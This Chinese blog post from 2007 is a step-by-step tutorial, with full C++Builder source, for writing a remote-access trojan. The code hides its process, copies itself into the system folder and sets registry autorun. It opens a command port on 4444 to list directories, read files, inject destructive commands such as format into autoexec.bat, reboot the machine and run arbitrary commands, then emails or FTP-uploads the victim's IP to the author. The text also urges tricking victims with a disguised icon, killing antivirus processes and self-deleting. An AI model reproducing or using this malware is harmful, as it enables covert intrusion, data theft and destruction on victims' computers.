posts - 112, comments - 215, trackbacks - 0, articles - 34
  IT博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

木马是如何编写的。

Posted on 2007-12-16 10:47 济公 阅读(1204) 评论(0)  编辑 收藏 引用 所属分类: Security

  特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布back orifice以来,木马犹如平地上的惊雷, 使在dos——windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。

  我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用bo控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(trojan)的历史是很悠久的:早在at&t unix和bsd unix十分盛行的年代,木马是由一些玩程式(主要是c)水平很高的年轻人(主要是老美)用c或shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版dos的熏陶下长大的,对网络可以说很陌生。直到win9x横空出世,尤其是winnt的普及,大大推动了网络事业的发展的时候,bo这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。

  自己编写木马,听起来很cool是不是?!木马一定是由两部分组成——服务器程序(server)和客户端程序(client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是tcp/ip协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。

  首先是编程工具的选择。目前流行的开发工具有c++builder、vc、vb和delphi,这里我们选用c++builder(以下简称 bcb);vc虽然好,但gui设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的bcb;delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的bo2000源代码,是vc编写的,网上俯拾皆是);vb嘛,谈都不谈——难道你还给受害者传一个 1兆多的动态链接库——msvbvm60.dll吗?

 启动c++builder 5.0企业版,新建一个工程,添加三个vcl控件:一个是internet页中的server socket,另两个是fastnet页中的nmftp和nmsmtp。server socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。socket最初是在unix上出现的,后来微软将它引入了 windows中(包括win98和winnt);后两个控件的作用是用来使程序具有ftp(file transfer protocol文件传输协议)和smtp(simple mail transfer protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

  form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个form就有300k之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含form,就像delphi用过程实现的小程序一般只有17k左右那样。

  我们首先应该让我们的程序能够隐身。双击form,首先在formcreate事件中添加可使木马在win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用registerserviceprocess()函数注册成服务进程(service process)就可以了。不过该函数的声明在borland预先打包的头文件中没有,那么我们只好自己来声明这个位于kernel32.dll中的鸟函数了。

  首先判断目标机的操作系统是win9x还是winnt:

{
dword dwversion = getversion();
// 得到操作系统的版本号
if (dwversion >= 0x80000000)
// 操作系统是win9x,不是winnt
 {
   typedef dword (callback* lpregisterserviceprocess)(dword,dword);
    //定义registerserviceprocess()函数的原型
    hinstance hdll;
   lpregisterserviceprocess lpregisterserviceprocess;
   hdll = loadlibrary("kernel32");
   //加载registerserviceprocess()函数所在的动态链接库kernel32.dll
   lpregisterserviceprocess = (lpregisterserviceprocess)getprocaddress(hdll,"registerserviceprocess");
    //得到registerserviceprocess()函数的地址
    lpregisterserviceprocess(getcurrentprocessid(),1);
   //执行registerserviceprocess()函数,隐藏本进程
   freelibrary(hdll);
   //卸载动态链接库
 }
}

  这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为winnt中的进程管理器可以对当前进程一览无余,因此没必要在winnt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)

  接着再将自己拷贝一份到%system%目录下,例如:c:\windows\system,并修改注册表,以便启动时自动加载:

{ 
char temppath[max_path];
//定义一个变量
getsystemdirectory(temppath ,max_path);
//temppath是system目录缓冲区的地址,max_path是缓冲区的大小,得到目标机的system目录路径
systempath=ansistring(temppath);
//格式化temppath字符串,使之成为能供编译器使用的样式
copyfile(paramstr(0).c_str(), ansistring(systempath+"\\tapi32.exe").c_str() ,false);
//将自己拷贝到%system%目录下,并改名为tapi32.exe,伪装起来
registry=new tregistry;
//定义一个tregistry对象,准备修改注册表,这一步必不可少
registry->rootkey=hkey_local_machine;
//设置主键为hkey_local_machine
registry->openkey("software\\microsoft\\windows\\
currentversion\\run",true);
//打开键值software\\microsoft\\windows\\currentversion\\run,如果不存在,就创建之
try
 {
  //如果以下语句发生异常,跳至catch,以避免程序崩溃
  if(registry->readstring("crossbow")!=systempath+"\\tapi32.exe")
    registry->writestring("crossbow",systempath+"\\tapi32.exe");
    //查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%system%+tapi32.exe
   //如果不是,就写入以上键值和内容
 }
catch(...)
 {
 //如果有错误,什么也不做
 }
}

  好,formcreate过程完成了,这样每次启动都可以自动加载tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。

  接着选中serversocket控件,在左边的object inspector中将active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用 1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,windows也不会报错 ^_^)。你可以看一看tnmftp控件使用的端口,是21号端口,这是ftp协议的专用控制端口(ftp control port);同理tnmsmtp的25号端口也是smtp协议的专用端口。

  再选中serversocket控件,点击events页,双击onclientread事件,敲入以下代码:

{
 file *fp=null;
 char * content;
 int times_of_try;
 char tempfile[max_path];
 //定义了一堆待会儿要用到的变量
 sprintf(tempfile, "%s", ansistring(systempath+ansistring("\\win369.bat")).c_str());
 //在%system%下建立一个文本文件win369.bat,作为临时文件使用
 ansistring temp=socket->receivetext();
 //接收客户端(攻击者,也就是你自己)传来的数据
}

  好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改autoexec.bat和config.sys吧:

{
if(temp.substring(0,9)=="edit conf")
 //如果接受到的字符串的前9个字符是“edit conf”
 {
   int number=temp.length();
   //得到字符串的长度
   int file_name=atoi((temp.substring(11,1)).c_str());
   //将第11个字符转换成integer型,存入file_name变量
   //为什么要取第11个字符,因为第10个字符是空格字符
   content=(temp.substring(12,number-11)+'\n').c_str();
   //余下的字符串将被作为写入的内容写入目标文件
   file *fp=null;
   char filename[20];
   chmod("c:\\autoexec.bat",s_iread|s_iwrite);
   chmod("c:\\config.sys",s_iread|s_iwrite);
   //将两个目标文件的属性改为可读可写
   if(file_name==1)
    sprintf(filename,"%s","c:\\autoexec.bat");
    //如果第11个字符是1,就把autoexec.bat格式化
   else if(file_name==2)
    sprintf(filename,"%s","c:\\config.sys");
    //如果第11个字符是1,就把config.sys格式化
   times_of_try=0;
   //定义计数器
   while(fp==null)
    {
     //如果指针是空
    fp=fopen(filename,"a+");
    //如果文件不存在,创建之;如果存在,准备在其后添加
    //如果出错,文件指针为空,这样就会重复
    times_of_try=times_of_try+1;
    //计数器加1
    if(times_of_try>100)
    {
       //如果已经试了100次了,仍未成功
       socket->sendtext("fail by open file");
       //就发回“fail by open file”的错误信息
       goto end;
       //跳至end处
    }
    }
   fwrite(content,sizeof(char),strlen(content),fp);
   //写入添加的语句,例如deltree/y c:或者format/q/autotest c:,够毒吧?!
   fclose(fp);
   //写完后关闭目标文件
   socket->sendtext("sucess");
   //然后发回“success”的成功信息
  }
}

  你现在可以通过网络来察看目标机上的这两个文件了,并且还可以向里面随意添加任何命令。呵呵,这只不过是牛刀小试罢了。朋友,别走开!

 

 上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲啰:

{
else if(temp.substring(0,3)=="dir")
{
  //如果前3个字符是“dir”
  int read_num;
  char * cr_lf="\n";
  int attrib;
  char *filename;
  dir *dir;
  struct dirent *ent;
  int number=temp.length();
  //得到字符串的长度
  ansistring dir_name=temp.substring(5,number-3);
  //从字符串第六个字符开始,将后面的字符存入dir_name变量,这是目录名
  if(dir_name=="")
   {
    //如果目录名为空
    socket->sendtext("fail by open dir's name");
    //返回“fail by open dir's name”信息
    goto end;
    //跳到end
   }
  char * dirname;
  dirname=dir_name.c_str();
  if ((dir = opendir(dirname)) == null)
   {
    //如果打开目录出错
    socket->sendtext("fail by your dir's name!");
    //返回“fail by your dir's name”信息
    goto end;
    //跳到end
   }
  times_of_try=0;
  while(fp==null)
   {
    //如果指针是null
    fp=fopen(tempfile,"w+");
    //就创建system\win369.bat准备读和写;如果此文件已存在,则会被覆盖
    times_of_try=times_of_try+1;
    //计数器加1
    if(times_of_try>100)
      {
      //如果已经试了100次了,仍未成功(真有耐心!)
      socket->sendtext("fail by open file");
      //就发回“fail by open file”的错误信息
      goto end;
      //并跳到end处
      }
    }
   while ((ent = readdir(dir)) != null)
    {
     //如果访问目标目录成功
     if(*(ansistring(dirname)).ansilastchar()!='\\')
     //如果最后一个字符不是“\”,证明不是根目录
     filename=(ansistring(dirname)+"\\"+ent->d_name).c_str();
     //加上“\”字符后将指针指向目录流
     else
     filename=(ansistring(dirname)+ent->d_name).c_str();
     //如果是根目录,则不用加“\”
     attrib=_rtl_chmod(filename, 0);
     //得到目标文件的访问属性
     if (attrib & fa_rdonly)
     //“&”字符是比较前后两个变量,如果相同返回1,否则返回0
     fwrite(" r",sizeof(char),3,fp);
     //将目标文件属性设为只读
     else
     fwrite(" ",sizeof(char),3,fp);
     //失败则写入空格
     if (attrib & fa_hidden)
     fwrite("h",sizeof(char),1,fp);
     //将目标文件属性设为隐藏
     else
     fwrite(" ",sizeof(char),1,fp);
     //失败则写入空格
     if (attrib & fa_system)
     fwrite("s",sizeof(char),1,fp);
     //将目标文件属性设为系统
     else
     fwrite(" ",sizeof(char),1,fp);
     //失败则写入空格
     if (attrib & fa_arch)
     fwrite("a",sizeof(char),1,fp);
     //将目标文件属性设为普通
     else
     fwrite(" ",sizeof(char),1,fp);
     //失败则写入空格
     if (attrib & fa_direc)
     fwrite("

",sizeof(char),9,fp);
     //将目标文件属性设为目录
     else
     fwrite("     ",sizeof(char),9,fp);
     //失败则写入空格
     fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
     //将目录名写入目标文件
     fwrite(cr_lf,1,1,fp);
     //写入换行
    }
    fclose(fp);
    //关闭文件
    closedir(dir);
    //关闭目录
    file *fp1=null;
    times_of_try=0;
    while(fp1==null)
     {
     fp1=fopen(tempfile,"r");
     //打开win369.bat准备读
     times_of_try=times_of_try+1;
     //计数器加1
     if(times_of_try>100)
     {
       //如果已经试了100次了,仍未成功
       socket->sendtext("fail by open file");
       //就发回“fail by open file”的错误信息
       goto end;
       //并跳到end处
     }
     }
    ansistring return_text="";
    char temp_content[300];
    for(int i=0;i<300;i++) temp_content[i]='\0';
    //定义的一个空数组
    read_num=fread(temp_content,1,300,fp1);
    //从目标文件中读入前300个字符
    while(read_num==300)
    {
     return_text=return_text+temp_content;
     //return_text变量加上刚才的300个字符
     for(int i=0;i<300;i++) temp_content[i]='\0';
     read_num=fread(temp_content,1,300,fp1);
     //重复
    };
    return_text=return_text+temp_content;
    //return_text变量加上刚才的300个字符
    fclose(fp1);
    //关闭目标文件
    socket->sendtext(return_text);
    //返回return_text变量的内容
  }

  够长吧?!察看目录树这么费劲啊?!你后面可以用bcb中的各种列表框对client.exe好好美化美化。接下来就是查看指定文件的内容了,client将使用“type”命令,(手指累不累啊?):

{
else if(temp.substring(0,4)=="type")
{
  //如果前4个字符是“type”
  int read_num;
  int number=temp.length();
  ansistring file_name=temp.substring(6,number-4);
  //将目标文件流存入file_name变量中
  times_of_try=0;
  while(fp==null)
   {
    fp=fopen(file_name.c_str(),"r");
    //打开目标文件准备读
    times_of_try=times_of_try+1;
    //计数器加1
    if(times_of_try>100)
    {
     //如果已试了100次了
      socket->sendtext("fail by open file");
      //返回“fail by open file”的错误信息
      goto end;
      //跳到end
    }
   }
  ansistring return_text="";
  char temp_content[300];
  for(int i=0;i<300;i++) temp_content[i]='\0';
  //定义一个空数组
  read_num=fread(temp_content,1,300,fp);
  //从目标文件中读入前300个字符
  while(read_num==300)
   {
    return_text=return_text+temp_content;
    //return_text的内容加上刚才的字符
    for(int i=0;i<300;i++) temp_content[i]='\0';
    read_num=fread(temp_content,1,300,fp);
    //重复
   };
  return_text=return_text+temp_content;
  //return_text的内容加上刚才的字符
  fclose(fp);
  //关闭目标文件
  socket->sendtext(return_text);
  //返回return_text的内容,即你查看文件的内容
}
}

  咳咳!累死了!还是来点轻松的吧——操纵目标机的光驱(注意:mcisendstring()函数的声明在mmsystem.h头文件中):

{
else if(temp=="open")
{
  //如果收到的temp的内容是“open”
  mcisendstring("set cdaudio door open", null, 0, null);
  //就弹出光驱的托盘
}
else if(temp=="close")
{
  //如果收到的temp的内容是“close”
  mcisendstring("set cdaudio door closed wait", null, 0, null);
  //就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^
}
}

  接着就是交换目标机的鼠标左右键,代码如下:
{
else if(temp=="swap")
{
  swapmousebutton(1);
  //交换鼠标左右键,简单吧?
}
}

  然后就是使目标机重新启动。但这里要区分winnt和win9x——nt非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:

{
else if(temp=="reboot")
{
  //如果收到的temp的内容是“temp”
  dword dwversion = getversion();
  //得到操作系统的版本号
  if (dwversion < 0x80000000)
  {
    //操作系统是winnt,不是win9x
   handle htoken;
   token_privileges tkp;
   //定义变量
   openprocesstoken(getcurrentprocess(),token_adjust_privileges | token_query, &htoken);
   //openprocesstoken()这个函数的作用是打开一个进程的访问令牌
   //getcurrentprocess()函数的作用是得到本进程的句柄
   lookupprivilegevalue(null, se_shutdown_name,&tkp.privileges[0].luid);
   //lookupprivilegevalue()的作用是修改进程的权限
   tkp.privilegecount = 1;
    //赋给本进程特权
   tkp.privileges[0].attributes = se_privilege_enabled;
    adjusttokenprivileges(htoken, false, &tkp, 0,(ptoken_privileges)null, 0);
   //adjusttokenprivileges()的作用是通知windows nt修改本进程的权利
   exitwindowsex(ewx_reboot | ewx_force, 0);
    //强行退出winnt并重启
  }
  else exitwindowsex(ewx_force+ewx_reboot,0);
   //强行退出win9x并重启
}
}

  如果以上都不是,就让它在dos窗口中执行传来的命令:

{
else
{
  //如果都不是
  char * cr_tf="\n";
  times_of_try=0;
  while(fp==null)
  {
   fp=fopen(tempfile,"w+");
   //创建win369.bat,如果已存在就覆盖
   times_of_try=times_of_try+1;
    //计数器加1
   if(times_of_try>100)
   {
    socket->sendtext("fail by open file");
    //返回“fail by open file”的信息
    goto end;
    //跳到end
   }
  }
  fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
  //写入欲执行的命令
  fwrite(cr_tf,sizeof(char),strlen(cr_tf),fp);
  //写入换行符
  fclose(fp);
  //关闭win369.bat
  system(tempfile);
  //执行win369.bat
  socket->sendtext("success");
  //返回“success”信息
}
}

  你可以直接执行什么ping和tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如deltree和format命令。
  
  到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!

 

  上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们go on! 其代码如下(照敲不误 ^_^):

{
end:;
 socket-〉close();
 //关闭服务
 serversocket1-〉active =true;
 //再次打开服务
 if (nmsmtp1-〉connected) nmsmtp1-〉disconnect();
 //如果smtp服务器已连接则断开
 nmsmtp1-〉host = "smtp.163.net";
 //选一个好用的smtp服务器,如163、263、sina和btamail
 nmsmtp1-〉userid = "";
 //你smtp的id
 try
 {
  nmsmtp1-〉connect();
  //再次连接
 }
 catch(...)
 {
  goto nexttime;
  //跳到nexttime
 }
 nmsmtp1-〉postmessage-〉fromaddress ="i don't know!";
 //受害者的email地址
 nmsmtp1-〉postmessage-〉fromname = "casualty";
 //受害者的名字
 nmsmtp1-〉postmessage-〉toaddress-〉text = "crossbow@8848.net";
 //将信发到我的邮箱,这一步很关键
 nmsmtp1-〉postmessage-〉body-〉text = ansistring("server running on:") + nmsmtp1-〉localip ;
 //信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的ip地址,以便连接
 nmsmtp1-〉postmessage-〉subject = "server running now!";
 //信的主题
 nmsmtp1-〉sendmail();
 //发送!
 return;
 //返回

nexttime:
 nmftp1-〉host = "ftp.go.163.com";
 //你的ftp服务器的地址
 nmftp1-〉userid = "";
 //你的用户id
 nmftp1-〉port = 21;
 //ftp端口号,一般为21
 nmftp1-〉password = "";
 //你的ftp的密码
 if(nmftp1-〉connected) nmftp1-〉disconnect();
 //如果已连接就断开
 try
  {
   nmftp1-〉connect();
   //再连接
  }
 catch(...)
  {
    return;
    //返回
  }
 ansistring sendtosite = "server running on: " + nmftp1-〉remoteip;
 //受害者的ip地址
 file * upload;
 upload = fopen(nmftp1-〉remoteip.c_str(),"w+");
 //创建一个新文件准备写,如果已存在就覆盖
 fwrite(sendtosite.c_str(),sizeof(char),sendtosite.length(),upload);
 //写入以上的sendtosite的内容
 fclose(upload);
 //写完后关闭此文件
 nmftp1-〉removedir("public_html");
 //删除public_html目录
 nmftp1-〉upload(nmftp1-〉remoteip, nmftp1-〉remoteip);
 //上传!
}

  啊,超长的onclientread事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:

#include 〈stdlib.h〉
#include 〈dirent.h〉
#include 〈fcntl.h〉
#include 〈dos.h〉
#include 〈sys\stat.h〉
#include 〈winbase.h〉
#include 〈stdio.h〉
#include 〈process.h〉
#include 〈io.h〉
#include 〈mmsystem.h〉

  至此,服务器端(server)程序已全部完工!(终于可以好好歇歇了!)别慌!以上代码只是完成了整个木马程序的一半。(“扑通”,有人晕倒了!)下面我们就将乘胜追击——搞定客户端程序(client)!

  客户端程序其实是很简单的。另新建一个form,添加一个clientsocket(和serversocket在相同的页下),再添加四个 editbox,命名为edit1,edit2,edit3和edit4,最后添加一个button,caption为“发送”。edit1是输入命令用的,edit2是准备输入目标机的ip地址用的,edit3是输入连接端口号用的,edit4是用来输入欲添加的语句或显示命令执行的结果的。(头是不是有点大了?!)

  双击button1,在button1click事件中添加如下代码:

{
  if((edit2-〉text=="")||(edit3-〉text==""))return;
  //如果输入ip地址框或输入端口号框有一个为空,就什么也不作
  clientsocket1-〉address=edit2-〉text;
  //目标ip地址
  clientsocket1-〉port=atoi(edit2-〉text.c_str());
  //目标端口号,本例中的44444
  clientsocket1-〉open();
  //连接!
}

 选中cilentsocket1控件,双击onconnectt事件,在clientsocket1connect下添加如下代码:
{
 if((edit1-〉text=="edit conf 1")||(edit1-〉text=="edit conf 2"))
 //如果是要编辑autoexec.bat或config.sys
  socket-〉sendtext(edit1-〉text+edit4-〉text);
  //发送命令和欲添加的语句
 else
  socket-〉sendtext(edit1-〉text);
  //否则只发送命令
}

  双击onread事件,在clientsocket1read下添加如下代码:
{
 ansistring readin = socket-〉receivetext();
 //读入收到的返回信息
 edit4-〉text="";
 //清空编辑框
 file *fp;
 fp = fopen("readin.tmp","w");
 //建立一个临时文件readin.tmp
 fwrite(readin.c_str(),1,10000,fp);
 //写入信息
 fclose(fp);
 //关闭之
 edit4-〉lines-〉loadfromfile("readin.tmp");
 //在编辑框中显示返回的信息
}

  为了敲完命令后直接回车就可以发送,我们可以使button1的代码共享。双击edit1的onkeypress命令,输入:

{
 if(key==vk_return)button1click(sender);
 //如果敲的是回车键,就和点击button1一样的效果
}

  最后再添加以下头文件:

#include "stdlib.h"
#include "winbase.h"
#include "fcntl.h"
#include "stdio.h"

  终于写完了!!!(如果你对简陋的界面不满意,可以自己用bcb中丰富的控件好好完善完善嘛!)按下ctrl+f9进行编译链接吧!对于 server,你可以选一个足以迷惑人的图标(我选的是一个目录模样的图标)进行编译,这样不但受害者容易中招,而且便于隐藏自己。

  接下来就把server程序寄给受害者,诱骗他(她)执行,在你得到他(她)的ip后(这不用我教吧?),就启动client程序,敲入 “edit conf 1”就编辑autoexec.bat文件,敲入“edit conf 2”就编辑config.sys文件,敲入“dir xxx”(xxx是目录名)就可以看到目录和文件,敲“type xxx”就可以察看任何文件,输入“open”,弹出目标机的光驱托盘,“close”就收入托盘,输入“swap”就可以交换受害者的鼠标左右键,输入 “reboot”就启动目标机……不用我多说了吧?

  以上只是一个简单的例子,真正写起木马来要解决的技术问题比这多得多,这得需要扎实的编程功底和丰富的经验。如下的问题就值得仔细考虑:

  首先是程序的大小问题,本程序经编译链接后得到的可执行文件竟有400多k,用aspack1.07压了一下也还有200多k。可以看出不必要的form是应该去掉的;并且尽量由自己调用底层的api函数,而尽量少使用borland打好包的vcl控件;要尽量使用汇编语言(bcb支持c++和汇编混编),不但速度会加快,而且大小可以小很多,毕竟木马是越小越好。

  还有启动方式的选择。出了win.ini、system.ini之外,也还是那几个注册表键值,如:

hkey_local_machine\software\microsoft\windows\currentversion\run

hkey_local_machine\software\microsoft\windows\currentversion\
runservices

hkey_current_user\software\microsoft\windows\currentversion\run

都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了(如冰河和广外女生)。这里涉及到参数传递的问题。得到 paramstr()函数传来的参数,启动自己后再启动与之关联的程序,并将参数传递给它,这样就完成了一次“双启动”,而受害者丝毫感觉不到有任何异常。具体键值如:

  与exe文件建立关联:hkey_classes_root\exefile\shell\open\command
  与txt文件建立关联:hkey_classes_root\txtfile\shell\open\command
  与dll文件建立关联:hkey_classes_root\dllfile\shell\open\command

等,当然还可以自己扩充。目前还有一种新方法:在

hkey_local_machine\software\microsoft\windows nt\currentversion
\windows 下添加如下键值 "appinit_dlls"="server.dll",这就把server.dll注册为系统启动时必须加载的模块(你应该把木马编译成dll)。下次开机时,木马以动态链接库形式被加载,存在于系统进程中。因为没有它自己的pid(process id 进程识别号),所以在nt的任务管理器中也看不见(不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的),这样做的目的是可以使自己的程序更加隐蔽,提高木马的生存能力。

  木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件,截图存为jpg文件传回,录音监听成wav文件,录像成avi文件,弹光驱,读软驱,关机,重启,不停地挂起,胡乱切换分辨率(烧掉你的显示器),发对话框,不停地打开资源管理器直到死机,杀掉 kernel32.dll进程使机器暴死,交换鼠标左右键,固定鼠标,限制鼠标活动范围,鼠标不听指挥到处乱窜,记录击键记录(记录上网口令,这需要深入了解钩子(hook)技术,如键盘钩子和鼠标钩子),窃取重要的密码文件如pwl和sam文件,格式化磁盘,乱写磁盘扇区(像病毒大爆发),破坏零磁道,乱写bios(像cih),胡乱设置cmos,加密mbr、hdpt和fat(像江民炸弹)……真是琳琅满目、心狠手辣呀!而且实现起来并不是很复杂,只不过后面几项需要比较扎实的汇编功底而已(有几项要用到vxd技术)。唉!路漫漫其修远兮,吾将上下而求索……

  如果你想更安全地执行你的入侵活动,就应该像广外女生一样可以杀掉防火墙和杀毒软件的进程。防火墙和杀毒软件监视的是特征码,如果你是新木马,它就不吱一声;但是如果你打开不寻常的端口,它就会跳出来报警。因此最好的办法是启动后立即分析当前进程,查找有没有常见防火墙和杀毒软件的进程,如果有就杀无赦。比如常见的如:lockdown,天网防火墙,网络卫兵,kv3000,瑞星,金山毒霸,pc-cillin,panda,mcafee, norton和checkpoint。杀掉后,再在特定的内存地址中作一个标记,使它们误以为自己已启动,因此不会再次启动自己了。
  
  针对来自反汇编工具的威胁。如果有人试图将你的木马程序反汇编,他成功后,你的一切秘密就暴露在他的面前了,因此,我们要想办法保护自己的作品。首先想到的是条件跳转,条件跳转对于反向工程来说并不有趣。没有循环,只是跳转,作为使偷窃者令人头痛的路障。这样,就没有简单的反向操作可以执行了。陷阱,另一个我不太肯定,但听说有程序使用的方法:用crc校验你的exe文件,如果它被改变了,不要显示典型错误信息,而给予偷窃者致命的一击。

  最后如果你需要它完成任务后可以自己删除自己,我提示你:退出前建立一个批处理文件,加入循环删除本exe文件和本批处理文件自己的命令后保存,执行它,再放心地退出。你可以试一下,所有文件都消失了吧?!这叫“踏雪无痕”。

  入侵安装了防火墙的机器最好使用自己编写的木马,这样不光防火墙不会报警,而且你自己心里也坦然一些——毕竟是自己的作品吗!如果你是系统管理员,那就请你不要偷懒,不仅要经常扫描1024以下的端口,而且包括1024以上的高端端口也要仔细扫描,65535个端口一个也不能漏。因为许多木马打开的就是高端端口(如本例中的4444)。

只有注册用户登录后才能发表评论。